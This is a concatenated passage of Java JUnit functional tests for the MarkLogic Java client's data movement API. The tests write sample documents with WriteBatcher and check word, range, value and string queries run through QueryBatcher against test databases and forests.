Long.parseLong(batchDetailsArray[3]) == 0); // verify the forest get method values. String[] forestDetailsArray = forestDetails.toString().split("\\|"); assertTrue("Database name returned from batch is not correct", forestDetailsArray[0].equalsIgnoreCase(dbName)); assertTrue("Forest name returned from batch is not correct", forestDetailsArray[2].equalsIgnoreCase(testMultipleForest[0]) || forestDetailsArray[2].equalsIgnoreCase(testMultipleForest[1])); // verify the job ticket get method values. This needs to be implemented. /*String[] jobTicketArray = jobDetails.toString().split("\\|"); assertTrue("Job Id returned from batch is not correct", jobTicketArray[0].equalsIgnoreCase(jobId)); assertTrue("Job Type name returned from batch is not correct", forestDetailsArray[2].equalsIgnoreCase(jobName));*/ } } catch (Exception e) { System.out.println("Exceptions thrown from Test testAndWordQueryWithMultipleForests"); System.out.println(e.getMessage()); } finally { // Associate back the original DB. associateRESTServerWithDB(restServerName, dbName); detachForest(testMultipleDB, testMultipleForest[0]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); Thread.sleep(10000); clientTmp.release(); } } /* * These are test methods that verify that different query types work. * Testing - * Word query * range query * value query */ @Test public void testDifferentQueryTypes() throws Exception { String testMultipleDB = "QBtestDifferentQueryTypesDB"; String[] testMultipleForest = {"QBtestDifferentQueryTypesDB-1"}; DatabaseClient clientTmp = null; DataMovementManager dmManagerTmp = null; try { System.out.println("Running testDifferentQueryTypes"); //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); // Setup constraints on DB and wait for indexes to setup. setupAppServicesConstraint(testMultipleDB); Thread.sleep(10000); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; ServerConfigurationManager srvMgr = client.newServerConfigManager(); srvMgr.readConfiguration(); srvMgr.setQueryOptionValidation(true); srvMgr.writeConfiguration(); clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); dmManagerTmp = clientTmp.newDataMovementManager(); QueryManager queryMgr = clientTmp.newQueryManager(); // create query def StructuredQueryBuilder qb = queryMgr.newStructuredQueryBuilder(); StructuredQueryDefinition queryWorddef = qb.word(qb.element("id"), "0026"); //Use WriteBatcher to write the some files. WriteBatcher batcher = dmManagerTmp.newWriteBatcher(); batcher.withBatchSize(2); // Move to individual data sub folders. String dataFileDir = dataConfigDirPath + "/data/"; InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); batcher.add("/abs-range-constraint/batcher-contraints1.xml", contentHandle1); batcher.add("/abs-range-constraint/batcher-contraints2.xml", contentHandle2); batcher.add("/abs-range-constraint/batcher-contraints3.xml", contentHandle3); batcher.add("/abs-range-constraint/batcher-contraints4.xml", contentHandle4); batcher.add("/abs-range-constraint/batcher-contraints5.xml", contentHandle5); // Flush batcher.flushAndWait(); //batcher.awaitCompletion(); StringBuilder batchWordResults = new StringBuilder(); StringBuilder batchWordFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(queryWorddef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchWordResults.append(str) .append('|'); } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure in testDifferentQueryTypes"); throwable.printStackTrace(); batchWordFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); while(!queryBatcher1.isStopped()) { // do nothing. } if (queryBatcher1.isStopped()) { if (!batchWordFailResults.toString().isEmpty() && batchWordFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions in testDifferentQueryTypes - Word Query"); } // Verify the batch results now. String[] res = batchWordResults.toString().split("\\|"); assertEquals("Number of reults returned is incorrect", 1, res.length); assertTrue("URI returned not correct", res[0].contains("/abs-range-constraint/batcher-contraints5.xml")); } // Run a range query. StructuredQueryDefinition queryRangedef = qb.range(qb.element("popularity"), "xs:integer", Operator.GE, 4); QueryBatcher queryBatcher2 = dmManagerTmp.newQueryBatcher(queryRangedef); //StringBuilder batchRangeResults = new StringBuilder(); List<String> batchRangeResults = new ArrayList<String>(); StringBuilder batchRangeFailResults = new StringBuilder(); queryBatcher2.onUrisReady(batch-> { for (String str : batch.getItems()) { batchRangeResults.add(str); //batchRangeResults.append(str) //.append('|'); } }); queryBatcher2.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure in testDifferentQueryTypes"); throwable.printStackTrace(); batchRangeFailResults.append("Test has Exceptions"); } ); jobTicket = dmManagerTmp.startJob(queryBatcher2); bJobFinished = queryBatcher2.awaitCompletion(3, TimeUnit.MINUTES); while(!queryBatcher2.isStopped()) { // do nothing. } if (queryBatcher2.isStopped()) { if (!batchRangeFailResults.toString().isEmpty() && batchRangeFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions in testDifferentQueryTypes - Word Query"); } // Verify the batch results now. assertTrue("No of documents returned in range query not correct", batchRangeResults.size() == 4); assertTrue("URI returned not correct", batchRangeResults.contains("/abs-range-constraint/batcher-contraints1.xml")); assertTrue("URI returned not correct", batchRangeResults.contains("/abs-range-constraint/batcher-contraints2.xml")); assertTrue("URI returned not correct", batchRangeResults.contains("/abs-range-constraint/batcher-contraints4.xml")); assertTrue("URI returned not correct", batchRangeResults.contains("/abs-range-constraint/batcher-contraints5.xml")); } // Run a ValueQueryOnAttribute query. StructuredQueryDefinition valuequeyDef = qb.value(qb.elementAttribute(qb.element(new QName("http://cloudbank.com", "price")), qb.attribute("amt")), "0.1"); QueryBatcher queryBatcher3 = dmManagerTmp.newQueryBatcher(valuequeyDef); //StringBuilder batchRangeResults = new StringBuilder(); List<String> batchValueResults = new ArrayList<String>(); StringBuilder batchvalueFailResults = new StringBuilder(); queryBatcher3.onUrisReady(batch-> { for (String str : batch.getItems()) { batchValueResults.add(str); } }); queryBatcher3.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure in testDifferentQueryTypes"); throwable.printStackTrace(); batchvalueFailResults.append("Test has Exceptions"); } ); jobTicket = dmManagerTmp.startJob(queryBatcher3); bJobFinished = queryBatcher3.awaitCompletion(3, TimeUnit.MINUTES); while(!queryBatcher3.isStopped()) { // do nothing. } if (queryBatcher3.isStopped()) { if (!batchvalueFailResults.toString().isEmpty() && batchvalueFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions in testDifferentQueryTypes - Word Query"); } // Verify the batch results now. assertTrue("No of documents returned in range query not correct", batchValueResults.size() == 1); assertTrue("URI returned not correct", batchRangeResults.contains("/abs-range-constraint/batcher-contraints1.xml")); } } catch (Exception e) { System.out.println("Exceptions thrown from Test testDifferentQueryTypes"); System.out.println(e.getMessage()); } finally { // Associate back the original DB. associateRESTServerWithDB(restServerName, dbName); detachForest(testMultipleDB, testMultipleForest[0]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); clientTmp.release(); Thread.sleep(10000); } } }
test-complete/src/test/java/com/marklogic/client/datamovement/functionaltests/StringQueryHostBatcherTest.java
/* * Copyright 2014-2017 MarkLogic Corporation * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.marklogic.client.datamovement.functionaltests; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertNotEquals; import static org.junit.Assert.assertTrue; import static org.junit.Assert.fail; import java.io.File; import java.io.FileInputStream; import java.io.IOException; import java.util.ArrayList; import java.util.Calendar; import java.util.List; import java.util.concurrent.TimeUnit; import javax.xml.namespace.QName; import javax.xml.parsers.ParserConfigurationException; import javax.xml.transform.TransformerException; import javax.xml.xpath.XPathExpressionException; import org.junit.After; import org.junit.AfterClass; import org.junit.Before; import org.junit.BeforeClass; import org.junit.Ignore; import org.junit.Test; import org.xml.sax.SAXException; import com.fasterxml.jackson.databind.JsonNode; import com.marklogic.client.DatabaseClient; import com.marklogic.client.DatabaseClientFactory; import com.marklogic.client.DatabaseClientFactory.Authentication; import com.marklogic.client.admin.ExtensionMetadata; import com.marklogic.client.admin.ServerConfigurationManager; import com.marklogic.client.admin.TransformExtensionsManager; import com.marklogic.client.datamovement.DataMovementManager; import com.marklogic.client.datamovement.Forest; import com.marklogic.client.datamovement.JobTicket; import com.marklogic.client.datamovement.QueryBatcher; import com.marklogic.client.datamovement.WriteBatcher; import com.marklogic.client.datamovement.functionaltests.util.DmsdkJavaClientREST; import com.marklogic.client.document.JSONDocumentManager; import com.marklogic.client.document.ServerTransform; import com.marklogic.client.io.DOMHandle; import com.marklogic.client.io.FileHandle; import com.marklogic.client.io.Format; import com.marklogic.client.io.InputStreamHandle; import com.marklogic.client.io.JacksonHandle; import com.marklogic.client.io.StringHandle; import com.marklogic.client.query.QueryManager; import com.marklogic.client.query.RawCombinedQueryDefinition; import com.marklogic.client.query.StringQueryDefinition; import com.marklogic.client.query.StructuredQueryBuilder; import com.marklogic.client.query.StructuredQueryBuilder.Operator; import com.marklogic.client.query.StructuredQueryDefinition; /** * @author ageorge * Purpose : Test String Queries * - On multiple documents using Java Client DocumentManager Write method and WriteBatcher. * - On meta-data. * - On non-existent document. Verify error message. * - With invalid string query. Verify error message. * */ public class StringQueryHostBatcherTest extends DmsdkJavaClientREST { private static String dbName = "StringQueryHostBatcherDB"; private static String [] fNames = {"StringQueryHostBatcherDB-1", "StringQueryHostBatcherDB-2", "StringQueryHostBatcherDB-3"}; private static DataMovementManager dmManager = null; private static DataMovementManager moveMgr = null; private static String restServerHost = null; private static String restServerName = null; private static int restServerPort = 0; private static DatabaseClient clientQHB = null; private static DatabaseClient client = null; private static String dataConfigDirPath = null; /** * @throws java.lang.Exception */ @BeforeClass public static void setUpBeforeClass() throws Exception { loadGradleProperties(); restServerPort = getRestAppServerPort(); restServerHost = getRestAppServerHostName(); restServerName = getRestAppServerName(); // Points to top level of all QA data folder dataConfigDirPath = getDataConfigDirPath(); setupJavaRESTServer(dbName, fNames[0], restServerName, restServerPort); setupAppServicesConstraint(dbName); createUserRolesWithPrevilages("test-eval","xdbc:eval", "xdbc:eval-in","xdmp:eval-in","any-uri","xdbc:invoke"); createRESTUser("eval-user", "x", "test-eval","rest-admin","rest-writer","rest-reader","rest-extension-user","manage-user"); // For use with Java/REST Client API client = DatabaseClientFactory.newClient(restServerHost, restServerPort, "admin", "admin", Authentication.DIGEST); dmManager = client.newDataMovementManager(); // For use with QueryHostBatcher clientQHB = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); moveMgr = clientQHB.newDataMovementManager(); } /** * @throws java.lang.Exception */ @AfterClass public static void tearDownAfterClass() throws Exception { System.out.println("In tearDownAfterClass"); // Release clients client.release(); clientQHB.release(); associateRESTServerWithDB(restServerName, "Documents" ); deleteRESTUser("eval-user"); detachForest(dbName, fNames[0]); deleteDB(dbName); deleteForest(fNames[0]); } /** * @throws java.lang.Exception */ @Before public void setUp() throws Exception { System.out.println("In setup"); } /** * @throws java.lang.Exception */ @After public void tearDown() throws Exception { System.out.println("In tearDown"); clearDB(restServerPort); } /* * To test String query with Document Manager (Java Client API write method) and WriteBatcher. * @throws IOException * @throws ParserConfigurationException * @throws SAXException * @throws XpathException */ @Test public void testAndWordQuery() throws IOException, ParserConfigurationException, SAXException, InterruptedException { System.out.println("Running testAndWordQuery"); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; String queryOptionName = "absRangeConstraintWithVariousGrammarAndWordQueryOpt.xml"; try { // write docs using Java Client API for (String filename : filenames) { writeDocumentUsingInputStreamHandle(client, filename, "/abs-range-constraint/", "XML"); } setQueryOption(client, queryOptionName); QueryManager queryMgr = client.newQueryManager(); // create query def StringQueryDefinition querydef = queryMgr.newStringDefinition(queryOptionName); querydef.setCriteria("(pop:high OR pop:medium) AND price:medium AND intitle:served"); // create handle to search using Java Client API. JacksonHandle jh = new JacksonHandle(); JsonNode jsonResults = queryMgr.search(querydef, jh).get(); // Verify the results. JsonNode searchResult = jsonResults.get("results").get(0); assertEquals(1, searchResult.get("index").asInt()); assertEquals("/abs-range-constraint/constraint4.xml", searchResult.get("uri").asText()); String contents = searchResult.get("content").asText(); assertTrue("Expected String not available", contents.contains("Vannevar served")); assertTrue("Expected amt not available", contents.contains("12.34")); // Clear the database. clearDB(8000); //Use WriteBatcher to write the same files. WriteBatcher batcher = dmManager.newWriteBatcher(); // Move to individual data sub folders. String dataFileDir = dataConfigDirPath + "/data/"; batcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); batcher.add("/abs-range-constraint/batcher-contraints1.xml", contentHandle1); batcher.add("/abs-range-constraint/batcher-contraints2.xml", contentHandle2); batcher.add("/abs-range-constraint/batcher-contraints3.xml", contentHandle3); batcher.add("/abs-range-constraint/batcher-contraints4.xml", contentHandle4); batcher.add("/abs-range-constraint/batcher-contraints5.xml", contentHandle5); // Verify if the batch flushes when batch size is reached. // Flush batcher.flushAndWait(); // Hold for asserting the callbacks batch contents, since callback are on different threads than the main JUnit thread. // JUnit can not assert on different threads; other than the main one. StringBuilder batchResults = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch -> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); } batchResults.append(batch.getForest().getForestName()) .append('|') .append(batch.getJobBatchNumber()) .append('|'); }); queryBatcher1.onQueryFailure(throwable -> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); }); JobTicket jobTicket = dmManager.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertTrue("URI returned not correct", res[0].contains("/abs-range-constraint/batcher-contraints4.xml")); //Verify Fores Name. assertTrue("Forest name not correct", res[2].contains(fNames[0])); } } catch(Exception e) { System.out.print(e.getMessage()); } finally { } } /* * To test String query with multiple forests. * @throws Exception * */ @Test public void testAndWordQueryWithMultipleForests() throws Exception { String testMultipleDB = "QBMultipleForestDB"; String[] testMultipleForest = {"QBMultipleForestDB-1", "QBMultipleForestDB-2", "QBMultipleForestDB-3"}; DatabaseClient clientTmp = null; DataMovementManager dmManagerTmp = null; try { System.out.println("Running testAndWordQueryWithMultipleForests"); //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); createForest(testMultipleForest[1], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); setupAppServicesConstraint(testMultipleDB); Thread.sleep(10000); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; String queryOptionName = "absRangeConstraintWithVariousGrammarAndWordQueryOpt.xml"; clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); dmManagerTmp = clientTmp.newDataMovementManager(); setQueryOption(clientTmp, queryOptionName); QueryManager queryMgr = clientTmp.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("0012"); // Move to individual data sub folders. String dataFileDir = dataConfigDirPath + "/data/"; //Use WriteBatcher to write the same files. WriteBatcher batcher = dmManagerTmp.newWriteBatcher(); batcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); batcher.add("/abs-range-constraint/batcher-contraints1.xml", contentHandle1); batcher.add("/abs-range-constraint/batcher-contraints2.xml", contentHandle2); batcher.add("/abs-range-constraint/batcher-contraints3.xml", contentHandle3); batcher.add("/abs-range-constraint/batcher-contraints4.xml", contentHandle4); batcher.add("/abs-range-constraint/batcher-contraints5.xml", contentHandle5); // Verify if the batch flushes when batch size is reached. // Flush batcher.flushAndWait(); // Hold for asserting the callbacks batch contents, since callback are on different threads than the main JUnit thread. // JUnit can not assert on different threads; other than the main one. StringBuilder batchResults = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertEquals("Number of reults returned is incorrect", 1, res.length); assertTrue("URI returned not correct", res[0].contains("/abs-range-constraint/batcher-contraints2.xml")); } } catch (Exception e) { System.out.println("Exceptions thrown from Test testAndWordQueryWithMultipleForests"); System.out.println(e.getMessage()); } finally { // Associate back the original DB. associateRESTServerWithDB(restServerName, dbName); detachForest(testMultipleDB, testMultipleForest[0]); detachForest(testMultipleDB, testMultipleForest[1]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); deleteForest(testMultipleForest[1]); Thread.sleep(10000); clientTmp.release(); } } /* * To test query by example with WriteBatcher and QueryBatcher. * @throws IOException * @throws InterruptedException */ /*public void testQueryByExample() throws IOException, InterruptedException { System.out.println("Running testQueryByExample"); String[] filenames = {"constraint1.json", "constraint2.json", "constraint3.json", "constraint4.json", "constraint5.json"}; WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); StringBuffer writebatchResults = new StringBuffer(); batcher.add("/batcher-contraints1.json", contentHandle1); batcher.add("/batcher-contraints2.json", contentHandle2); batcher.add("/batcher-contraints3.json", contentHandle3); batcher.add("/batcher-contraints4.json", contentHandle4); batcher.add("/batcher-contraints5.json", contentHandle5); // Flush batcher.flushAndWait(); StringBuilder querybatchResults = new StringBuilder(); StringBuilder querybatchFailResults = new StringBuilder(); // get the query File file = new File(dataConfigDirPath + "qbe1.json"); FileHandle fileHandle = new FileHandle(file); QueryManager queryMgr = client.newQueryManager(); RawQueryByExampleDefinition qbyexDef = queryMgr.newRawQueryByExampleDefinition(fileHandle.withFormat(Format.JSON)); // Run a QueryBatcher. QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(qbyexDef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { querybatchResults.append(str) .append('|'); } querybatchResults.append(batch.getJobResultsSoFar()) .append('|') .append(batch.getForest().getForestName()) .append('|') .append(batch.getJobBatchNumber()) .append('|'); }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); querybatchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManager.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitTermination(30, TimeUnit.SECONDS); if (queryBatcher1.isStopped()) { if (!querybatchFailResults.toString().isEmpty() && querybatchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = querybatchResults.toString().split("\\|"); assertTrue("URI returned not correct", res[0].contains("/batcher-contraints1.json")); assertEquals("Bytes Moved","0", res[1]); assertEquals("Batch Number","0", res[3]); } }*/ /* * To test query by example with WriteBatcher and QueryBatcher * with Query Failure (incorrect query syntax). * * @throws IOException * @throws InterruptedException */ // EA 3 Modify the test for batch failure results. Remove the fail. @Ignore public void testQueryBatcherQueryFailures() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherQueryFailures"); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(2); // Move to individual data sub folders. String dataFileDir = dataConfigDirPath + "/data/"; InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); batcher.add("/fail-contraints1.xml", contentHandle1); batcher.add("/fail-contraints2.xml", contentHandle2); batcher.add("/fail-contraints3.xml", contentHandle3); batcher.add("/fail-contraints4.xml", contentHandle4); batcher.add("/fail-contraints5.xml", contentHandle5); // Flush batcher.flushAndWait(); StringBuilder batchResults = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // create query def String combinedQuery = "{\"search\":" + "{\"query\":{\"value-constraint-query\":{\"constraint-name\":\"id\", \"text\":\"0026\"}}," + "\"options\":{\"return-metrcs\":false, \"return-qtext\":false, \"debug\":true, \"transorm-results\":{\"apply\":\"raw\"}," + "\"constraint\":{\"name\":\"id\", \"value\":{\"element\":{\"ns\":\"\", \"name\":\"id\"}}}}}}"; System.out.println("QUERY IS : "+ combinedQuery); // create a handle for the search criteria StringHandle rawHandle = new StringHandle(combinedQuery); rawHandle.setFormat(Format.JSON); QueryManager queryMgr = client.newQueryManager(); // create a search definition based on the handle RawCombinedQueryDefinition querydef = queryMgr.newRawCombinedQueryDefinition(rawHandle); // Run a QueryBatcher. QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str).append('|'); } batchResults.append(batch.getJobResultsSoFar()) .append('|') .append(batch.getForest().getForestName()) .append('|') .append(batch.getJobBatchNumber()) .append('|'); }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); Forest forest = throwable.getForest(); batchFailResults.append("Test has Exceptions") .append('|') .append(throwable.getForestResultsSoFar()) .append('|') /*.append(throwable. getJobRecordNumber()) .append('|') .append(throwable.getBatchRecordNumber()) .append('|') .append(throwable.getSourceUri()) .append('|') .append(throwable.getMimetype()) .append('|') */ .append(forest.getForestName()) .append('|') .append(forest.getHost()) .append('|') .append(forest.getDatabaseName()) .append('|') /*.append(forest.isDeleteOnly()) .append('|')*/ .append(forest.isUpdateable()); } ); JobTicket jobTicket = dmManager.startJob(queryBatcher1); queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if( !batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { // Write out and assert on query failures. System.out.println("Exception Buffer contents on Query Exceptions received from callback onQueryFailure"); System.out.println(batchFailResults.toString()); // Remove this failure once there are no NPEs and doa asserts on various counters in failure scenario. fail("Test failed due to exceptions"); } } } /* * To test QueryBatcher's callback support by invoking the client object to do a lookup * Insert only one document to validate the functionality * @throws IOException * @throws InterruptedException */ @Test public void testQueryBatcherCallbackClient() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherCallbackClient"); String[] filenames = {"constraint1.json"}; WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(2); // Move to individual data sub folders. String dataFileDir = dataConfigDirPath + "/data/"; InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); batcher.add("contraints1.json", contentHandle1); // Flush batcher.flushAndWait(); StringBuffer batchFailResults = new StringBuffer(); String expectedStr = "Vannevar Bush wrote an article for The Atlantic Monthly"; QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("Vannevar"); // Run a QueryBatcher. QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(querydef); queryBatcher1.withBatchSize(1000); //Hold for contents read back from callback client. StringBuffer ccBuf = new StringBuffer(); queryBatcher1.onUrisReady(batch-> { // Do a lookup back into the database with the client and batch content. // Want to verify if the client object can be utilized from a Callback. JSONDocumentManager docMgr = batch.getClient().newJSONDocumentManager(); JacksonHandle jh = new JacksonHandle(); docMgr.read(batch.getItems()[0], jh); System.out.println("JH Contents is " + jh.get().toString()); System.out.println("Batch Contents is " + batch.getItems()[0]); ccBuf.append(jh.get().toString()); }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions").append('|'); } ); JobTicket jobTicket = dmManager.startJob(queryBatcher1); queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if( !batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { // Write out and assert on query failures. System.out.println("Exception Buffer contents on Query Exceptions received from callback onQueryFailure"); System.out.println(batchFailResults.toString()); fail("Test failed due to exceptions"); } System.out.println("Contents from the callback are : " + ccBuf.toString()); // Verify the Callback contents. assertTrue("Lookup for a document from Callback using the client failed", ccBuf.toString().contains(expectedStr)); } } /* * Test to validate QueryBatcher when there is no data. * No search results are returned. */ @Test public void testQueryBatcherWithNoData() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherWithNoData"); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("John AND Bob"); // Run a QueryBatcher when no results are returned. QueryBatcher queryBatcherNoResult = dmManager.newQueryBatcher(querydef); StringBuilder batchNoResults = new StringBuilder(); StringBuilder batchNoFailResults = new StringBuilder(); queryBatcherNoResult.onUrisReady(batch -> { for (String str : batch.getItems()) { batchNoResults.append(str).append('|'); } }); queryBatcherNoResult.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure when no results returned"); // Should be empty in a successful run. Else fill the buffer to report error. batchNoFailResults.append("Test has Exceptions"); batchNoFailResults.append("|"); }); JobTicket jobTicketNoRes = dmManager.startJob(queryBatcherNoResult); queryBatcherNoResult.awaitCompletion(30, TimeUnit.SECONDS); if (queryBatcherNoResult.isStopped()) { assertTrue("Query returned no results when there is no data" , batchNoResults.toString().isEmpty()); } } /* * To test query by example with WriteBatcher and QueryBatcher * 1) Verify batch size on QueryBatcher. * * * @throws IOException * @throws InterruptedException */ @Test public void testQueryBatcherBatchSize() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherBatchSize"); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("John AND Bob"); WriteBatcher batcher = 